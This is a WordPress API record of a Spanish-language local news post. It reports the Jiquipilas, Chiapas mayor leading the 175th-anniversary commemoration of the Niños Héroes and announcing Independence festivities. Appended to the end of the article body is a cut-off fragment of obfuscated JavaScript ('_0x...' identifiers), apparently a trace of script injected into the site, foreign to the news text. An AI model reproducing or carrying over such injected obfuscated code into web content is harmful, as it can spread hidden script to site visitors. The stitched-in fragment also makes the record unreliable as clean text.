{"id":5085,"date":"2022-09-14T02:40:20","date_gmt":"2022-09-14T02:40:20","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=5085"},"modified":"2022-09-14T02:40:20","modified_gmt":"2022-09-14T02:40:20","slug":"encabeza-hugo-lazaro-conmemoracion-de-la-gesta-heroica-de-los-ninos-heroes","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=5085","title":{"rendered":"Encabeza Hugo L\u00e1zaro conmemoraci\u00f3n de la gesta heroica de los ni\u00f1os H\u00e9roes"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"577\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/IMG-20220913-WA0035-1024x577.jpg\" alt=\"\" class=\"wp-image-5086\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/IMG-20220913-WA0035-1024x577.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/IMG-20220913-WA0035-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/IMG-20220913-WA0035-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/IMG-20220913-WA0035-1536x865.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/IMG-20220913-WA0035.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u2022 El edil se\u00f1al\u00f3 que nuestro pa\u00eds requiere de hombres y mujeres valientes, dispuestos a seguir defendiendo la patria.<div>\u2022 Agradeci\u00f3 a los catedr\u00e1ticos y alumnos de la EPAJ por su participaci\u00f3n en este acto. <\/div><\/p>\n\n\n\n<p><div>13 de Septiembre del.2022. Jiquipilas, chiapas.- El alcalde C\u00e9sar Hugo L\u00e1zaro Rodr\u00edguez encabez\u00f3 la conmemoraci\u00f3n del 175 de la gesta heroica de los ni\u00f1os h\u00e9roes y la valent\u00eda de los j\u00f3venes soldados que dieron su vida por defender el castillo de Chapultepec.El edil jiquipilteco destac\u00f3 el amor a la patria de los seis ni\u00f1os h\u00e9roes que sin duda nos dejan una ense\u00f1anza para defender desde nuestra trinchera a nuestro pa\u00eds, estado y por supuesto a Jiquipilas. &#8220;Hoy conmemoramos el 175 aniversario luctuoso de los ni\u00f1os h\u00e9roes y sin lugar a dudas nuestro pa\u00eds requiere de hombres y mujeres valientes, dispuestos a seguir defendiendo la patria as\u00ed como lo hicieron los seis ni\u00f1os h\u00e9roes&#8221;, se\u00f1al\u00f3 L\u00e1zaro Rodr\u00edguez.Durante los honores al l\u00e1baro patrio se pas\u00f3 lista de honor a Juan de la Barrera, Juan Escutia, Agust\u00edn Melgar, Vicente Su\u00e1rez, Fernando Montes de Oca y Francisco M\u00e1rquez, enseguida el alcance monto una guardia de honor acompa\u00f1ado de integrantes del cabildo.El mun\u00edcipe se\u00f1al\u00f3 que se trabaja con un plan de seguridad para este inicio de las fiestas patrias por lo que invit\u00f3 a la ciudadan\u00eda a participar en est\u00e1s fiestas patrias.&#8221;Agradezco a mi amigo y director de la EPAJ el contador Sergio Espinoza Garc\u00eda y a los alumnos de la instituci\u00f3n por acompa\u00f1arnos en esta conmemoraci\u00f3n, muchas gracias a personal del ayuntamiento y DIF municipal por siempre respaldar las acciones de este gobierno&#8221;, concluy\u00f3 Hugo L\u00e1zaro.Por \u00faltimo se\u00f1al\u00f3 que para este 14 y 15 de  septiembre habr\u00e1n eventos culturales y gastron\u00f3micas como parte de los festejos, adem\u00e1s del tradicional grito de independencia y el cierre con un baile con banda la indomable.<\/div><\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u2022 El edil se\u00f1al\u00f3 que nuestro pa\u00eds requiere de hombres y mujeres valientes, dispuestos a seguir defendiendo la patria.\u2022 Agradeci\u00f3 a los catedr\u00e1ticos y alumnos de la EPAJ por su participaci\u00f3n en este acto. 13 de Septiembre del.2022. Jiquipilas, chiapas.- El alcalde C\u00e9sar Hugo L\u00e1zaro Rodr\u00edguez encabez\u00f3 la conmemoraci\u00f3n del 175 de la gesta heroica &hellip;<\/p>\n","protected":false},"author":2,"featured_media":5086,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-5085","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5085","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5085"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5085\/revisions"}],"predecessor-version":[{"id":5087,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5085\/revisions\/5087"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/5086"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5085"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5085"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5085"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}